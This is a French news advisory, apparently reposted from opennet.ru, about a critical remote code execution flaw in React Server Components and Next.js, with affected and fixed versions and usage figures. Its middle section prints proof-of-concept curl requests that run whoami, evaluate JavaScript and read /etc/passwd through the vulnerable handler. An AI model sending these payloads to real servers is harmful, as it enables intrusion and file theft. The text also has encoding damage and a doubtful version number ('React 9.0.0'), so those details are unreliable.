Vulnérabilité dans les composants serveur de React permettant d'exécuter un code sur le serveur

Dans les composants serveur du framework web React (RSC, React Server Components), une vulnĂ©rabilitĂ© a Ă©tĂ© corrigĂ©e (CVE-2025-55182) qui permettait d'exĂ©cuter du code arbitraire sur le serveur en envoyant une requĂȘte au gestionnaire serveur. La vulnĂ©rabilitĂ© a Ă©tĂ© classĂ©e avec un niveau de danger critique (10 sur 10). Elle est prĂ©sente dans les composants expĂ©rimentaux react-server-dom-webpack, react-server-dom-parcel et react-server-dom-turbopack, utilisĂ©s pour exĂ©cuter des fonctions et gĂ©nĂ©rer des Ă©lĂ©ments d'interface sur le serveur, plutĂŽt que du cĂŽtĂ© client.

Le problĂšme est causĂ© par une dĂ©sĂ©rialisation non sĂ©curisĂ©e des donnĂ©es reçues dans des requĂȘtes HTTP vers les gestionnaires serveur. Les gestionnaires « vm#runInThisContext », « vm#runInNewContext », « child_process#execFileSync » et « child_process#execSync » peuvent ĂȘtre utilisĂ©s pour exĂ©cuter des commandes sur le systĂšme ou pour exĂ©cuter du code JavaScript dans le contexte du processus en cours (bypasser l'isolation du sandbox). L'utilisation des gestionnaires « fs#readFileSync » et « fs#writeFileSync » pour lire et Ă©crire des fichiers arbitraires sur le systĂšme est Ă©galement possible. le serveur, dans la limite des droits d'accĂšs actuels. Aucune authentification n'est requise pour l'attaque. Un prototype d'exploit est disponible. # ExĂ©cution de la commande whoami curl -X POST http://localhost:3002/formaction \ -F ‘$ACTION_REF_0=’ \ -F ‘$ACTION_0:0={«id»:»child_process#execSync»,»bound»:[«whoami»]}’ # ExĂ©cution de code JavaScript 1+1 curl -X POST http://localhost:3002/formaction \ -F ‘$ACTION_REF_0=’ \ -F ‘$ACTION_0:0={«id»:»vm#runInThisContext»,»bound»:[«1+1»]}’ # Lecture du fichier /etc/passwd curl -X POST http://localhost:3002/formaction \ -F ‘$ACTION_REF_0=’ \ -F ‘$ACTION_0:0={«id»:»fs#readFileSync»,»bound»:[«/etc/passwd»,»utf8″]}’

La susceptibilité des systÚmes aux vulnérabilités dépend de l'utilisation des composants serveur vulnérables react-server-dom-webpack, react-server-dom-parcel et react-server-dom-turbopack. Les applications ne utilisant pas react-server ne sont pas affectées par la vulnérabilité. L'ampleur de l'impact de la vulnérabilité sur les systÚmes en production utilisant React n'est pas encore claire. D'un cÎté, React est l'un des frameworks web les plus populaires (utilisé sur environ 6 % des sites web), et les composants vulnérables sont principalement développés dans le dépÎt principal et inclus dans les versions. Les composants vulnérables sont également pris en charge dans les frameworks basés sur React, comme Next.js et react-router. Selon la société Wiz Research, des instances vulnérables ont été identifiées dans 39 % des environnements cloud analysés.

D'un autre cĂŽtĂ©, la gĂ©nĂ©ration de contenu sur le serveur via React Server Les composants ne sont pas une fonctionnalitĂ© souvent utilisĂ©e (la plupart des sites React rendent l'interface uniquement cĂŽtĂ© client), et les composants vulnĂ©rables sont signalĂ©s comme expĂ©rimentaux et ne garantissent pas un fonctionnement correct. Ces composants ont un nombre relativement faible de tĂ©lĂ©chargements directs du dĂ©pĂŽt NPM : react-server-dom-webpack — 670 000 par semaine, react-server-dom-parcel — 7 000 et react-server-dom-turbopack — 32 000, pour comparaison le package NPM React a 45 millions de tĂ©lĂ©chargements par semaine.

La vulnérabilité est présente dans les versions React 9.0.0, 19.1.0, 19.1.1 et 19.2.0, et a été corrigée dans les mises à jour React 19.0.1, 19.1.2 et 19.2.1. Les composants vulnérables sont également utilisés dans les packages Next.js (16 millions de téléchargements par semaine), react-router (20 millions de téléchargements par semaine), waku, @parcel/rsc, @vitejs/plugin-rsc et rwsdk.

Dans le framework Next.js, la vulnérabilité (CVE-2025-66478) affecte les applications utilisant App Router et les branches Next.js 15.x et 16.x. Il est affirmé que la vulnérabilité se manifeste dans la configuration par défaut de Next.js (l'application standard générée par l'outil create-next-app est vulnérable). Les utilisateurs sont invités à mettre à jour Next.js dÚs que possible vers les versions 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7 ou 16.0.7.

Source : opennet.ru

Acheter un hĂ©bergement fiable pour les sites avec protection DDoS, serveurs VPS VDS đŸ”„ Acheter un hĂ©bergement fiable pour les sites avec protection DDoS, serveurs VPS VDS | ProHoster